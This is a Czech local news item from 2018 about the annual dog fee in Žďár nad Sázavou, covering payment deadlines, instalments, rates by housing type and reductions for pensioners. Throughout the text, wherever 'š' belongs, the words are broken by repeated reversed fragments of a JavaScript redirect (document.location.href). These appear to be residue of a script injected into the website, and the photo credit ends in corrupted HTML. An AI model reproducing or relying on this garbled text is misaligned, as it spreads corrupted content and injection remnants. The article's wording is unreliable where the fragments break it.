Rainbow page separator

Do konce března musí žďárští chovatelé uhradit poplatek za psa

Středa, 7. března 2018

Žďár nad Sázavou / Do konce března jsou držitelé psů povinni žďárské radnici zaplatit příslušný místní poplatek. Poplatek je možné uhradit ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově, případně prostřednictvím platební karty v pokladně městského úřadu.
Za předpokladu, že je roční sazba poplatku vyšší než pět set korun, je splatný ve dvou stejných splátkách, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to za první pololetí do posledního března a za druhé pololetí do konce srpna. V domech s jedním nebo dvěma byty je chovatel povinen uhradit 300 korun ročně za jednoho psa, za druhého a každého dalšího pak 900 korun. V by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domech jedno zvíře vyjde na 900 korun, každé další stejného držitele na dva tisíce korun.
V místních částech Žďáru se platí s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovka za jednoho psa v domě, druhý a další vychází na dvě s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky. V domku s více než dvěma obytnými jednotkami jde o částku ve výši 200 korun za jedno zvíře a 500 korun za další. Méně za svého čtyřnohého zvířecího kamaráda uhradí pobiratelé invalidního, starobního, vdovského či vdoveckého důchodu, jenž je jediným zdrojem jejich příjmů, a rovněž lidé pobírající sirotčí důchod. Poplatku za psa nejsou zproštěny ani osoby s trvalým bydlištěm v sídle ohlašovny, které jsou povinny za jedno zvíře zaplatit 600 korun a za další čtrnáct s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek ročně. V nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostech s evidenčním číslem činí poplatek za prvního psa s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to korun ročně a tři s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky za každého dalšího. Na zvíře přihlášené v sídle podnikání se vztahuje místní poplatek ve výši 900 korun za rok, za druhého a každého dalšího psa jde v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě o dva tisíce korun.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tohalama/“ target=“_blank“ rel=“noopener noreferrer“>www.pho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tohalama.com